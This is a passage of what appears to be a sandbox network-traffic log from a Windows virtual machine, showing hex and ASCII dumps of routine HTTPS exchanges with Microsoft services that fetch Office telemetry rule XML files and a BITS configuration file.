2024-11-21 08:53:41 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-21 08:53:41 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-21 08:53:41 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-21 08:53:41 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-21 08:53:41 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-21 08:53:41 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-21 08:53:41 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-21 08:53:41 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.6	49726	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:41 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 4c 6a 5a 73 2f 6e 78 75 45 47 75 42 50 75 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 62 38 39 62 37 66 62 38 65 61 32 37 30 39 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: sLjZs/nxuEGuBPu/.1Context: 84b89b7fb8ea2709
2024-11-21 08:53:41 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-21 08:53:41 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 73 4c 6a 5a 73 2f 6e 78 75 45 47 75 42 50 75 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 62 38 39 62 37 66 62 38 65 61 32 37 30 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 65 43 71 62 73 64 2f 4f 79 57 46 57 67 38 45 48 79 4a 70 32 41 41 73 74 73 6a 69 47 75 76 31 58 36 65 5a 55 44 44 2b 51 49 36 44 78 50 50 7a 37 67 77 39 62 51 46 52 5a 79 63 45 47 74 5a 50 4e 4f 44 62 39 4d 74 36 37 78 31 50 72 76 34 46 39 70 71 75 39 63 56 6a 30 49 79 6c 61 6d 67 67 58 79 4f 38 6f 59 58 2f 62 36 50 6d 65 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: sLjZs/nxuEGuBPu/.2Context: 84b89b7fb8ea2709<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAeeCqbsd/OyWFWg8EHyJp2AAstsjiGuv1X6eZUDD+QI6DxPPz7gw9bQFRZycEGtZPNODb9Mt67x1Prv4F9pqu9cVj0IylamggXyO8oYX/b6Pme
2024-11-21 08:53:41 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 73 4c 6a 5a 73 2f 6e 78 75 45 47 75 42 50 75 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 62 38 39 62 37 66 62 38 65 61 32 37 30 39 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: sLjZs/nxuEGuBPu/.3Context: 84b89b7fb8ea2709
2024-11-21 08:53:41 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-21 08:53:41 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 67 37 56 37 4b 45 32 44 49 30 61 76 64 2b 47 32 58 38 77 32 78 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: g7V7KE2DI0avd+G2X8w2xg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49731	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:43 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-21 08:53:43 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF70) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=201108 Date: Thu, 21 Nov 2024 08:53:43 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	49733	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:43 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:43 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:43 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: ac6669be-e01e-003c-668c-3ac70b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085343Z-1777c6cb754xjpthhC1TEBexs80000000at0000000002sy0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:43 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	49732	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:43 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:43 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:43 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 1c744767-001e-0082-6060-3b5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085343Z-178bfbc474bpnd5vhC1NYC4vr40000000170000000009c4k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:43 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.6	49734	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:43 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:43 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:43 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 1aa7a34d-201e-0096-3676-3bace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085343Z-178bfbc474bwlrhlhC1NYCy3kg0000000180000000006t06 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:43 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.6	49736	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:43 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:43 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:43 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: e579fe48-a01e-001e-648c-3a49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085343Z-1777c6cb7544nvmshC1TEBf7qc0000000aq0000000007sr5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:43 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.6	49735	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:43 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:43 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:43 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085343Z-178bfbc474bgvl54hC1NYCsfuw0000000190000000003m42 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:43 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" 